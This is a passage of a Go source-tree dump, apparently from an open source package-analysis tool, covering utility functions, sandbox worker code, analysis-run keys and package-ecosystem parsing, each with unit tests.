r.Header.Get("user-agent") 61 | if got != want { 62 | t.Errorf("User Agent = %q, want %q", got, want) 63 | } 64 | w.WriteHeader(http.StatusOK) 65 | })) 66 | defer ts.Close() 67 | 68 | c := http.Client{ 69 | Transport: useragent.DefaultRoundTripper(http.DefaultTransport, ""), 70 | } 71 | resp, err := c.Get(ts.URL) 72 | if err != nil { 73 | t.Fatalf("Get() = %v; want no error", err) 74 | } 75 | if resp.StatusCode != http.StatusOK { 76 | t.Fatalf("Get() status = %v; want 200", resp.StatusCode) 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /internal/utils/combine_regexp.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "regexp" 5 | "strings" 6 | ) 7 | 8 | // CombineRegexp creates a single regexp by joining the argument regexps together 9 | // using the | operator. Each regexp is put into a separate non-capturing group before 10 | // being combined. 11 | func CombineRegexp(regexps ...*regexp.Regexp) *regexp.Regexp { 12 | patterns := Transform(regexps, func(r *regexp.Regexp) string { 13 | // create a non-capturing group for each regexp 14 | return "(?:" + r.String() + ")" 15 | }) 16 | return regexp.MustCompile(strings.Join(patterns, "|")) 17 | } 18 | -------------------------------------------------------------------------------- /internal/utils/combine_regexp_test.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "reflect" 5 | "regexp" 6 | "testing" 7 | ) 8 | 9 | type combineRegexpTestCase struct { 10 | name string 11 | regexps []*regexp.Regexp 12 | want *regexp.Regexp 13 | } 14 | 15 | func TestCombineRegexp(t *testing.T) { 16 | tests := []combineRegexpTestCase{ 17 | { 18 | name: "a b c", 19 | regexps: []*regexp.Regexp{ 20 | regexp.MustCompile("a"), 21 | regexp.MustCompile("b"), 22 | regexp.MustCompile("c"), 23 | }, 24 | want: regexp.MustCompile("(?:a)|(?:b)|(?:c)"), 25 | }, 26 | { 27 | name: "capturing groups", 28 | regexps: []*regexp.Regexp{ 29 | regexp.MustCompile("([0-9])"), 30 | regexp.MustCompile("([a-z])"), 31 | regexp.MustCompile("([A-Z])"), 32 | }, 33 | want: regexp.MustCompile("(?:([0-9]))|(?:([a-z]))|(?:([A-Z]))"), 34 | }, 35 | { 36 | name: "conjunction and capturing groups", 37 | regexps: []*regexp.Regexp{ 38 | regexp.MustCompile("(apple|pear)"), 39 | regexp.MustCompile("(red|blue)"), 40 | regexp.MustCompile("(up|down)"), 41 | }, 42 | want: regexp.MustCompile("(?:(apple|pear))|(?:(red|blue))|(?:(up|down))"), 43 | }, 44 | { 45 | name: "quantification", 46 | regexps: []*regexp.Regexp{ 47 | regexp.MustCompile("[!@#$%^&*()]{1, 30}"), 48 | regexp.MustCompile("\\s+"), 49 | regexp.MustCompile("[[:xdigit:]]?"), 50 | }, 51 | want: regexp.MustCompile("(?:[!@#$%^&*()]{1, 30})|(?:\\s+)|(?:[[:xdigit:]]?)"), 52 | }, 53 | { 54 | name: "combine regexps with quantifications", 55 | regexps: []*regexp.Regexp{ 56 | regexp.MustCompile("(apple|pear)"), 57 | regexp.MustCompile("(red|blue)"), 58 | regexp.MustCompile("(up|down)"), 59 | }, 60 | want: regexp.MustCompile("(?:(apple|pear))|(?:(red|blue))|(?:(up|down))"), 61 | }, 62 | } 63 | for _, tt := range tests { 64 | t.Run(tt.name, func(t *testing.T) { 65 | if got := CombineRegexp(tt.regexps...); !reflect.DeepEqual(got, tt.want) { 66 | t.Errorf("CombineRegexp() = %v, want %v", got, tt.want) 67 | } 68 | }) 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /internal/utils/comma_separated_flags.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "flag" 5 | "strings" 6 | ) 7 | 8 | // CommaSeparatedFlags creates a struct which can be used with the Golang flag library, 9 | // to allow passing a comma-separated list of strings as a single command-line argument. 10 | // 11 | // Make sure to call InitFlag() on the returned struct before calling flag.Parse(). 12 | func CommaSeparatedFlags(name string, values []string, usage string) CommaSeparatedFlagsData { 13 | return CommaSeparatedFlagsData{ 14 | Name: name, 15 | Values: values, 16 | Info: usage, 17 | } 18 | } 19 | 20 | type CommaSeparatedFlagsData struct { 21 | Name string 22 | Values []string 23 | Info string 24 | } 25 | 26 | func (csl *CommaSeparatedFlagsData) Set(values string) error { 27 | csl.Values = strings.Split(values, ",") 28 | return nil 29 | } 30 | 31 | func (csl *CommaSeparatedFlagsData) String() string { 32 | if csl.Values == nil { 33 | return "" 34 | } else { 35 | return strings.Join(csl.Values, ",") 36 | } 37 | } 38 | 39 | func (csl *CommaSeparatedFlagsData) InitFlag() { 40 | flag.Var(csl, csl.Name, csl.Info) 41 | } 42 | -------------------------------------------------------------------------------- /internal/utils/equals.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "encoding/json" 5 | "math" 6 | "reflect" 7 | ) 8 | 9 | // FloatEquals compares two floats and returns true if they are both 10 | // within absTol of each other, or are both NaN. 11 | // Note that normally NaN != NaN, but we define it as true because it's 12 | // convenient for comparing arrays and structs that contain floats. 13 | func FloatEquals(x1, x2, absTol float64) bool { 14 | return x1 == x2 || math.Abs(x1-x2) < absTol || (math.IsNaN(x1) && math.IsNaN(x2)) 15 | } 16 | 17 | // JSONEquals compares two byte sequences containing JSON data and returns true if 18 | // 1) both j1 and j2 contain valid JSON data, and 19 | // 2) the JSON objects that they represent are equal. 20 | // If j1 or j2 contain invalid JSON data, an error is returned. 21 | func JSONEquals(j1, j2 []byte) (bool, error) { 22 | // Adapted from https://stackoverflow.com/a/32409106 23 | var o1, o2 interface{} 24 | if err := json.Unmarshal(j1, &o1); err != nil { 25 | return false, err 26 | } 27 | if err := json.Unmarshal(j2, &o2); err != nil { 28 | return false, err 29 | } 30 | return reflect.DeepEqual(o1, o2), nil 31 | 32 | } 33 | -------------------------------------------------------------------------------- /internal/utils/file_write_data_utils.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "os" 5 | "path/filepath" 6 | ) 7 | 8 | /* 9 | Subfolder where write buffer data will be saved to disk before uploaded to a cloud bucket. 10 | This subfolder needs to be shared across files so all functions that access it will be defined here. 11 | */ 12 | 13 | const writeBufferFolder = "worker_tmp/write_buffers" 14 | 15 | // CreateAndWriteTempFile writes a file in the directory specified by 16 | // writeBufferFolder. 17 | // 18 | // This directory must be cleaned up with a call to RemoveTempFilesDirectory(). 19 | func CreateAndWriteTempFile(fileName string, data []byte) error { 20 | err := os.MkdirAll(writeBufferFolder, 0777) 21 | if err != nil { 22 | return err 23 | } 24 | 25 | f, err := os.Create(filepath.Join(writeBufferFolder, fileName)) 26 | if err != nil { 27 | return err 28 | } 29 | defer f.Close() 30 | _, err = f.Write(data) 31 | return err 32 | } 33 | 34 | func OpenTempFile(fileName string) (*os.File, error) { 35 | return os.Open(filepath.Join(writeBufferFolder, fileName)) 36 | } 37 | 38 | func RemoveTempFilesDirectory() error { 39 | return os.RemoveAll(writeBufferFolder) 40 | } 41 | -------------------------------------------------------------------------------- /internal/utils/hash_file.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "crypto/sha256" 5 | "fmt" 6 | "io" 7 | "os" 8 | ) 9 | 10 | // SHA256Hash returns the SHA256 hashsum of a file. 11 | func SHA256Hash(path string) (string, error) { 12 | f, err := os.Open(path) 13 | if err != nil { 14 | return "", err 15 | } 16 | defer f.Close() 17 | 18 | hash := sha256.New() 19 | if _, err = io.Copy(hash, f); err != nil { 20 | return "", err 21 | } 22 | 23 | return fmt.Sprintf("%x", hash.Sum([]byte{})), nil 24 | } 25 | -------------------------------------------------------------------------------- /internal/utils/hash_file_test.go: -------------------------------------------------------------------------------- 1 | package utils_test 2 | 3 | import ( 4 | "os" 5 | "path/filepath" 6 | "testing" 7 | 8 | "github.com/ossf/package-analysis/internal/utils" 9 | ) 10 | 11 | // pairs of strings and their SHA256 hash digests 12 | var hashPairs = [][2]string{ 13 | {"", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}, 14 | {"Hello, World!", "dffd6021bb2bd5b0af676290809ec3a53191dd81c7f70a4b28688a362182986f"}, 15 | {"Hello,\nWorld!", "d62b51d504f02642dab5003959af0c1557094c7d49dcc544aba37a0a5d8d1d0d"}, 16 | {"Hello,\nWorld!\n", "f5651768767f5e83d7001136251b6558a6d01550b04e12c1678ea3a0ca1e8a30"}, 17 | } 18 | 19 | func TestHashFile(t *testing.T) { 20 | tests := []struct { 21 | name string 22 | contents string 23 | want string 24 | }{ 25 | { 26 | name: "empty file", 27 | contents: hashPairs[0][0], 28 | want: hashPairs[0][1], 29 | }, 30 | { 31 | name: "single line", 32 | contents: hashPairs[1][0], 33 | want: hashPairs[1][1], 34 | }, 35 | { 36 | name: "multi line", 37 | contents: hashPairs[2][0], 38 | want: hashPairs[2][1], 39 | }, 40 | { 41 | name: "trailing new line", 42 | contents: hashPairs[3][0], 43 | want: hashPairs[3][1], 44 | }, 45 | } 46 | for _, test := range tests { 47 | t.Run(test.name, func(t *testing.T) { 48 | f := filepath.Join(t.TempDir(), "file.txt") 49 | err := os.WriteFile(f, []byte(test.contents), 0o666) 50 | if err != nil { 51 | t.Fatalf("Failed to prepare hash file: %v", err) 52 | } 53 | got, err := utils.SHA256Hash(f) 54 | if err != nil { 55 | t.Fatalf("Failed to generate hash: %v", err) 56 | } 57 | if got != test.want { 58 | t.Errorf("SHA256Hash() = %v; want %v", got, test.want) 59 | } 60 | }) 61 | } 62 | } 63 | 64 | func TestHashFile_MissingFile(t *testing.T) { 65 | f := filepath.Join(t.TempDir(), "missing.txt") 66 | got, err := utils.SHA256Hash(f) 67 | if err == nil { 68 | t.Error("SHA256Hash() returned no error; want an error") 69 | } 70 | if got != "" { 71 | t.Errorf("SHA256Hash() = %v; want ''", got) 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /internal/utils/last_bytes.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | // LastNBytes returns the last n bytes from b. 4 | // If len(b) <= n, b itself is returned, otherwise a copy of the bytes is returned. 5 | // If n is negative, the function will panic 6 | func LastNBytes(b []byte, n int) []byte { 7 | if n < 0 { 8 | panic("n cannot be negative") 9 | } 10 | if len(b) <= n { 11 | return b 12 | } 13 | return b[(len(b) - n):] 14 | } 15 | -------------------------------------------------------------------------------- /internal/utils/last_bytes_test.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | type lastNBytesTestCase struct { 9 | name string 10 | bytes []byte 11 | n int 12 | want []byte 13 | } 14 | 15 | func TestLastNBytes(t *testing.T) { 16 | tests := []lastNBytesTestCase{ 17 | { 18 | "empty_0", 19 | []byte{}, 20 | 0, 21 | []byte{}, 22 | }, 23 | { 24 | "empty_10", 25 | []byte{}, 26 | 10, 27 | []byte{}, 28 | }, 29 | { 30 | "abcd_0", 31 | []byte{'a', 'b', 'c', 'd'}, 32 | 0, 33 | []byte{}, 34 | }, 35 | { 36 | "abcd_1", 37 | []byte{'a', 'b', 'c', 'd'}, 38 | 1, 39 | []byte{'d'}, 40 | }, 41 | { 42 | "abcd_4", 43 | []byte{'a', 'b', 'c', 'd'}, 44 | 4, 45 | []byte{'a', 'b', 'c', 'd'}, 46 | }, 47 | { 48 | "abcd_5", 49 | []byte{'a', 'b', 'c', 'd'}, 50 | 5, 51 | []byte{'a', 'b', 'c', 'd'}, 52 | }, 53 | } 54 | for _, tt := range tests { 55 | t.Run(tt.name, func(t *testing.T) { 56 | if got := LastNBytes(tt.bytes, tt.n); !reflect.DeepEqual(got, tt.want) { 57 | t.Errorf("LastNBytes() = %v, want %v", got, tt.want) 58 | } 59 | }) 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /internal/utils/remove_duplicates.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | /* 4 | RemoveDuplicates takes a slice and returns a new slice with only the 5 | unique elements from the input slice. Ordering of the elements in the 6 | returned slice corresponds is done according to the earliest index 7 | of each unique value in the input slice. 8 | */ 9 | func RemoveDuplicates[T comparable](items []T) []T { 10 | seenItems := make(map[T]struct{}) // empty structs take up no space 11 | var uniqueItems []T 12 | for _, item := range items { 13 | if _, seen := seenItems[item]; !seen { 14 | seenItems[item] = struct{}{} 15 | uniqueItems = append(uniqueItems, item) 16 | } 17 | } 18 | return uniqueItems 19 | } 20 | -------------------------------------------------------------------------------- /internal/utils/transform.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | // Transform applies the given transform function fn: T -> R to each element t of slice ts 4 | // and returns a slice containing the corresponding results. 5 | func Transform[T, R any](ts []T, fn func(T) R) []R { 6 | result := make([]R, len(ts)) 7 | for i, t := range ts { 8 | result[i] = fn(t) 9 | } 10 | return result 11 | } 12 | -------------------------------------------------------------------------------- /internal/utils/write_file.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | ) 7 | 8 | /* 9 | WriteFile writes the given file contents to the given path. 10 | The file may optionally be marked as executable. 11 | */ 12 | func WriteFile(path string, contents []byte, executable bool) error { 13 | if err := os.WriteFile(path, contents, 0o666); err != nil { 14 | return err 15 | } 16 | 17 | if executable { 18 | if err := os.Chmod(path, 0o777); err != nil { 19 | return fmt.Errorf("could not set exec permissions on %s: %w", path, err) 20 | } 21 | } 22 | 23 | return nil 24 | } 25 | -------------------------------------------------------------------------------- /internal/worker/code_execution.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | "os" 7 | "path/filepath" 8 | "regexp" 9 | 10 | "github.com/ossf/package-analysis/internal/sandbox" 11 | ) 12 | 13 | // sandboxExecutionLogPath is the absolute path of the execution log file 14 | // inside the sandbox. This file is used for logging during the execute phase. 15 | const sandboxExecutionLogPath = "/execution.log" 16 | 17 | var nonSpaceControlChars = regexp.MustCompile("[\x00-\x08\x0b-\x1f\x7f]") 18 | 19 | // retrieveExecutionLog copies the execution log back from the sandbox 20 | // to the host, so it can be included in the dynamic analysis results. 21 | // To mitigate against binary code injection, all control characters except 22 | // tab and newline are stripped from the file. 23 | func retrieveExecutionLog(ctx context.Context, sb sandbox.Sandbox) (string, error) { 24 | executionLogDir, err := os.MkdirTemp("", "") 25 | if err != nil { 26 | return "", err 27 | } 28 | 29 | defer os.RemoveAll(executionLogDir) 30 | hostExecutionLogPath := filepath.Join(executionLogDir, "execution.log") 31 | 32 | // if the copy fails, it could be that the execution log is not actually present. 33 | // For now, we'll just log the error and otherwise ignore it 34 | if err := sb.CopyBackToHost(ctx, hostExecutionLogPath, sandboxExecutionLogPath); err != nil { 35 | slog.WarnContext(ctx, "Could not retrieve execution log from sandbox", "error", err) 36 | return "", nil 37 | } 38 | 39 | logData, err := os.ReadFile(hostExecutionLogPath) 40 | if err != nil { 41 | return "", err 42 | } 43 | 44 | // remove control characters except tab (\x09) and newline (\x0A) 45 | processedLog := nonSpaceControlChars.ReplaceAllLiteral(logData, []byte{}) 46 | slog.InfoContext(ctx, "Read execution log", "rawLength", len(logData), "processedLength", len(processedLog)) 47 | 48 | return string(processedLog), nil 49 | } 50 | -------------------------------------------------------------------------------- /internal/worker/logging.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "log/slog" 7 | "os/exec" 8 | 9 | "github.com/ossf/package-analysis/internal/analysis" 10 | "github.com/ossf/package-analysis/internal/log" 11 | "github.com/ossf/package-analysis/internal/pkgmanager" 12 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 13 | ) 14 | 15 | /* 16 | NOTE: These strings are referenced externally by infrastructure for dashboard 17 | reporting / metrics purposes, and so should be changed with care. 18 | 19 | See file infra/terraform/metrics/log_metrics.tf. 20 | */ 21 | const ( 22 | analysisCompleteLogMsg = "Analysis completed sucessfully" // TODO sucessfully -> successfully 23 | analysisErrorLogMsg = "Analysis error - analysis" 24 | timeoutErrorLogMsg = "Analysis error - timeout" 25 | otherErrorLogMsg = "Analysis error - other" 26 | runErrorLogMsg = "Analysis run failed" 27 | ) 28 | 29 | // LogDynamicAnalysisError indicates some error happened while attempting to run 30 | // the package code, which was not caused by the package itself. This means it was 31 | // not possible to analyse the package properly, and the results are invalid. 32 | func LogDynamicAnalysisError(ctx context.Context, pkg *pkgmanager.Pkg, errorPhase analysisrun.DynamicPhase, err error) { 33 | slog.ErrorContext(ctx, runErrorLogMsg, 34 | log.Label("phase", string(errorPhase)), 35 | "error", err) 36 | 37 | var exitErr *exec.ExitError 38 | if errors.As(err, &exitErr) { 39 | slog.DebugContext(ctx, "Command stderr", "stderr", exitErr.Stderr) 40 | } 41 | } 42 | 43 | // LogDynamicAnalysisResult indicates that the package code was run successfully, 44 | // and what happened when it was run. This may include errors in the analysis 45 | // of the package, but not errors in the running itself. 46 | func LogDynamicAnalysisResult(ctx context.Context, pkg *pkgmanager.Pkg, finalPhase analysisrun.DynamicPhase, finalStatus analysis.Status) { 47 | labels := []interface{}{ 48 | log.Label("last_phase", string(finalPhase)), 49 | } 50 | 51 | switch finalStatus { 52 | case analysis.StatusCompleted: 53 | slog.InfoContext(ctx, analysisCompleteLogMsg, labels...) 54 | case analysis.StatusErrorAnalysis: 55 | slog.WarnContext(ctx, analysisErrorLogMsg, labels...) 56 | case analysis.StatusErrorTimeout: 57 | slog.WarnContext(ctx, timeoutErrorLogMsg, labels...) 58 | case analysis.StatusErrorOther: 59 | slog.WarnContext(ctx, otherErrorLogMsg, labels...) 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /internal/worker/resolvepackage.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "fmt" 5 | 6 | "github.com/package-url/packageurl-go" 7 | 8 | "github.com/ossf/package-analysis/internal/pkgmanager" 9 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 10 | ) 11 | 12 | // ResolvePkg creates a Pkg object with the arguments passed to the worker process. 13 | func ResolvePkg(manager *pkgmanager.PkgManager, name, version, localPath string) (pkg *pkgmanager.Pkg, err error) { 14 | switch { 15 | case localPath != "": 16 | pkg = manager.Local(name, version, localPath) 17 | case version != "": 18 | pkg = manager.Package(name, version) 19 | default: 20 | pkg, err = manager.Latest(name) 21 | if err != nil { 22 | return nil, fmt.Errorf("failed to get latest version: %w", err) 23 | } 24 | if pkg.Version() == "" { 25 | return nil, fmt.Errorf("unknown package name '%s'", name) 26 | } 27 | } 28 | return pkg, nil 29 | } 30 | 31 | // ResolvePurl creates a Pkg object from the given purl 32 | // See https://github.com/package-url/purl-spec 33 | func ResolvePurl(purl packageurl.PackageURL) (*pkgmanager.Pkg, error) { 34 | ecosystem, err := pkgecosystem.ParsePurlType(purl.Type) 35 | if err != nil { 36 | return nil, err 37 | } 38 | 39 | manager := pkgmanager.Manager(ecosystem) 40 | if manager == nil { 41 | return nil, pkgecosystem.Unsupported(purl.Type) 42 | } 43 | 44 | // Prepend package namespace to package name, if present 45 | var pkgName string 46 | if purl.Namespace != "" { 47 | pkgName = purl.Namespace + "/" + purl.Name 48 | } else { 49 | pkgName = purl.Name 50 | } 51 | 52 | // Get the latest package version if not specified in the purl 53 | pkg, err := ResolvePkg(manager, pkgName, purl.Version, "") 54 | if err != nil { 55 | return nil, err 56 | } 57 | 58 | return pkg, nil 59 | } 60 | -------------------------------------------------------------------------------- /internal/worker/sandbox_options.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/internal/sandbox" 5 | ) 6 | 7 | // StaticSandboxOptions provides a set of sandbox options necessary to run the 8 | // static analysis sandboxes. 9 | func StaticSandboxOptions() []sandbox.Option { 10 | return []sandbox.Option{ 11 | sandbox.Image(defaultStaticAnalysisImage), 12 | sandbox.EchoStdErr(), 13 | } 14 | } 15 | 16 | // DynamicSandboxOptions provides a set of sandbox options necessary to run 17 | // dynamic analysis sandboxes. 18 | func DynamicSandboxOptions() []sandbox.Option { 19 | return []sandbox.Option{ 20 | sandbox.Image(defaultDynamicAnalysisImage), 21 | sandbox.EnableStrace(), 22 | sandbox.EnableRawSockets(), 23 | sandbox.EnablePacketLogging(), 24 | sandbox.LogStdOut(), 25 | sandbox.LogStdErr(), 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /internal/worker/savefilewriteresults.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "fmt" 7 | 8 | "github.com/ossf/package-analysis/internal/pkgmanager" 9 | "github.com/ossf/package-analysis/internal/resultstore" 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 12 | ) 13 | 14 | func saveFileWriteResults(rs *resultstore.ResultStore, ctx context.Context, pkg *pkgmanager.Pkg, data analysisrun.DynamicAnalysisData) error { 15 | if rs == nil { 16 | // TODO this should become a method on resultstore.ResultStore? 17 | return errors.New("resultstore is nil") 18 | } 19 | 20 | if err := rs.SaveDynamicAnalysis(ctx, pkg, data.FileWritesSummary, ""); err != nil { 21 | return fmt.Errorf("failed to upload file write analysis to blobstore = %w", err) 22 | } 23 | var allPhasesWriteBufferIdsArray []string 24 | for _, writeBufferIds := range data.FileWriteBufferIds { 25 | allPhasesWriteBufferIdsArray = append(allPhasesWriteBufferIdsArray, writeBufferIds...) 26 | } 27 | 28 | // Remove potential duplicates across phases. 29 | allPhasesWriteBufferIdsArray = utils.RemoveDuplicates(allPhasesWriteBufferIdsArray) 30 | version := pkg.Version() 31 | if err := rs.SaveTempFilesToZip(ctx, pkg, "write_buffers_"+version, allPhasesWriteBufferIdsArray); err != nil { 32 | return fmt.Errorf("failed to upload file write buffer results to blobstore = #{err}") 33 | } 34 | if err := utils.RemoveTempFilesDirectory(); err != nil { 35 | return fmt.Errorf("failed to remove temp files = #{err}") 36 | } 37 | return nil 38 | } 39 | -------------------------------------------------------------------------------- /osv-scanner.toml: -------------------------------------------------------------------------------- 1 | [[IgnoredVulns]] 2 | id = "CVE-2020-8911" 3 | reason = "Indirect dependency, vulnerable function is probably not used and we can't do much about it anyway" 4 | 5 | [[IgnoredVulns]] 6 | id = "GO-2022-0646" 7 | reason = "alias of CVE-2020-8911" 8 | -------------------------------------------------------------------------------- /pkg/api/analysisrun/key.go: -------------------------------------------------------------------------------- 1 | package analysisrun 2 | 3 | import ( 4 | "strings" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 7 | ) 8 | 9 | type Key struct { 10 | Ecosystem pkgecosystem.Ecosystem `json:"Ecosystem"` 11 | Name string `json:"Name"` 12 | Version string `json:"Version"` 13 | } 14 | 15 | func (k Key) String() string { 16 | return strings.Join([]string{string(k.Ecosystem), k.Name, k.Version}, "-") 17 | } 18 | -------------------------------------------------------------------------------- /pkg/api/analysisrun/key_test.go: -------------------------------------------------------------------------------- 1 | package analysisrun_test 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 7 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 8 | ) 9 | 10 | func TestStringify(t *testing.T) { 11 | tests := map[string]struct { 12 | input analysisrun.Key 13 | expected string 14 | }{ 15 | "simple stringify": { 16 | input: analysisrun.Key{Name: "genericpackage", Version: "2.05.0", Ecosystem: pkgecosystem.NPM}, 17 | expected: "npm-genericpackage-2.05.0", 18 | }, 19 | "pkg name with space": { 20 | input: analysisrun.Key{Name: "cool package", Version: "1.0.0", Ecosystem: pkgecosystem.PyPI}, 21 | expected: "pypi-cool package-1.0.0", 22 | }, 23 | "pkg name with forward slash": { 24 | input: analysisrun.Key{Name: "@ada/evilpackage", Version: "99.0.0", Ecosystem: pkgecosystem.NPM}, 25 | expected: "npm-@ada/evilpackage-99.0.0", 26 | }, 27 | } 28 | 29 | for name, test := range tests { 30 | t.Run(name, func(t *testing.T) { 31 | got := test.input.String() 32 | expected := test.expected 33 | if got != expected { 34 | t.Fatalf("%v: returned %v; expected %v", name, got, expected) 35 | } 36 | }) 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /pkg/api/analysisrun/phase.go: -------------------------------------------------------------------------------- 1 | package analysisrun 2 | 3 | // DynamicPhase represents a way to 'run' a package during its usage lifecycle. 4 | // This is relevant to dynamic analysis. 5 | type DynamicPhase string 6 | 7 | const ( 8 | DynamicPhaseExecute DynamicPhase = "execute" 9 | DynamicPhaseImport DynamicPhase = "import" 10 | DynamicPhaseInstall DynamicPhase = "install" 11 | ) 12 | 13 | // DefaultDynamicPhases the subset of AllDynamicPhases that are supported 14 | // by every ecosystem, and are run by default for dynamic analysis. 15 | func DefaultDynamicPhases() []DynamicPhase { 16 | return []DynamicPhase{DynamicPhaseInstall, DynamicPhaseImport} 17 | } 18 | 19 | // AllDynamicPhases lists each phase of dynamic analysis in order 20 | // that they are run. Each phase depends on the previous phases. 21 | func AllDynamicPhases() []DynamicPhase { 22 | return []DynamicPhase{DynamicPhaseInstall, DynamicPhaseImport, DynamicPhaseExecute} 23 | } 24 | -------------------------------------------------------------------------------- /pkg/api/notification/notification.go: -------------------------------------------------------------------------------- 1 | package notification 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 5 | ) 6 | 7 | // AnalysisRunComplete is a struct representing the message sent to notify when 8 | // a package analysis run is complete. 9 | type AnalysisRunComplete struct { 10 | Key analysisrun.Key 11 | } 12 | -------------------------------------------------------------------------------- /pkg/api/pkgecosystem/ecosystem.go: -------------------------------------------------------------------------------- 1 | // Package pkgecosystem defines the open source ecosystems supported by Package Analysis. 2 | package pkgecosystem 3 | 4 | import ( 5 | "errors" 6 | "fmt" 7 | ) 8 | 9 | // Ecosystem represents an open source package ecosystem from which packages can be downloaded. 10 | // 11 | // It implements encoding.TextUnmarshaler and encoding.TextMarshaler so it can 12 | // be used with flag.TextVar. 13 | type Ecosystem string 14 | 15 | const ( 16 | None Ecosystem = "" 17 | CratesIO Ecosystem = "crates.io" 18 | NPM Ecosystem = "npm" 19 | Packagist Ecosystem = "packagist" 20 | PyPI Ecosystem = "pypi" 21 | RubyGems Ecosystem = "rubygems" 22 | ) 23 | 24 | // ErrUnsupported is returned by Ecosystem.UnmarshalText when bytes that do not 25 | // correspond to a defined ecosystem constant is passed in as a parameter. 26 | var ErrUnsupported = errors.New("ecosystem unsupported") 27 | 28 | // Unsupported returns a new ErrUnsupported that adds the unsupported ecosystem name 29 | // to the error message 30 | func Unsupported(name string) error { 31 | return fmt.Errorf("%w: %s", ErrUnsupported, name) 32 | } 33 | 34 | // SupportedEcosystems is a list of all the ecosystems supported. 35 | var SupportedEcosystems = []Ecosystem{ 36 | CratesIO, 37 | NPM, 38 | Packagist, 39 | PyPI, 40 | RubyGems, 41 | } 42 | 43 | // SupportedEcosystemsStrings is the list of supported ecosystems represented as 44 | // strings. 45 | var SupportedEcosystemsStrings = EcosystemsAsStrings(SupportedEcosystems) 46 | 47 | // UnmarshalText implements the encoding.TextUnmarshaler interface. 48 | // 49 | // It will only succeed when unmarshaling ecosytems in SupportedEcosystems or 50 | // empty. 51 | func (e *Ecosystem) UnmarshalText(text []byte) error { 52 | ecosystem, err := Parse(string(text)) 53 | 54 | if err != nil { 55 | return err 56 | } 57 | 58 | *e = ecosystem 59 | return nil 60 | } 61 | 62 | // MarshalText implements the encoding.TextMarshaler interface. 63 | func (e Ecosystem) MarshalText() ([]byte, error) { 64 | return []byte(e), nil 65 | } 66 | 67 | // String implements the fmt.Stringer interface. 68 | func (e Ecosystem) String() string { 69 | return string(e) 70 | } 71 | 72 | // EcosystemsAsStrings converts a slice of Ecosystems to a string slice. 73 | func EcosystemsAsStrings(es []Ecosystem) []string { 74 | var s []string 75 | for _, e := range es { 76 | s = append(s, e.String()) 77 | } 78 | return s 79 | } 80 | 81 | // Parse returns an Ecosystem corresponding to the given string name, or 82 | // the None ecosystem along with an error if there is no matching Ecosystem. 83 | // If name == "", then the None ecosystem is returned with no error. 84 | func Parse(name string) (Ecosystem, error) { 85 | for _, s := range append(SupportedEcosystems, None) { 86 | if string(s) == name { 87 | return s, nil 88 | } 89 | } 90 | 91 | return None, Unsupported(name) 92 | } 93 | 94 | // ParsePurlType converts from a Package URL type, defined at 95 | // https://github.com/package-url/purl-spec/blob/master/PURL-TYPES.rst 96 | // to an Ecosystem object 97 | func ParsePurlType(purlType string) (Ecosystem, error) { 98 | switch purlType { 99 | case "cargo": 100 | return CratesIO, nil 101 | case "composer": 102 | return Packagist, nil 103 | case "gem": 104 | return RubyGems, nil 105 | default: 106 | // we use the same name for NPM and PyPI as the purl type string 107 | return Parse(purlType) 108 | } 109 | } 110 | -------------------------------------------------------------------------------- /pkg/api/pkgecosystem/ecosystem_test.go: -------------------------------------------------------------------------------- 1 | package pkgecosystem_test 2 | 3 | import ( 4 | "bytes" 5 | "testing" 6 | 7 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 8 | "golang.org/x/exp/slices" 9 | ) 10 | 11 | func TestEcosystemMarshalText(t *testing.T) { 12 | tests := []struct { 13 | name string 14 | eco pkgecosystem.Ecosystem 15 | want []byte 16 | }{ 17 | { 18 | name: "npm", 19 | eco: pkgecosystem.NPM, 20 | want: []byte("npm"), 21 | }, 22 | { 23 | name: "unsupported", 24 | eco: pkgecosystem.Ecosystem("this is a test"), 25 | want: []byte("this is a test"), 26 | }, 27 | { 28 | name: "empty", 29 | eco: pkgecosystem.None, 30 | want: []byte{}, 31 | }, 32 | } 33 | for _, test := range tests { 34 | t.Run(test.name, func(t *testing.T) { 35 | got, _ := test.eco.MarshalText() 36 | if !bytes.Equal(got, test.want) { 37 | t.Errorf("MarshalText() = %v; want %v", got, test.want) 38 | } 39 | }) 40 | } 41 | } 42 | 43 | func TestEcosystemUnmarshalText(t 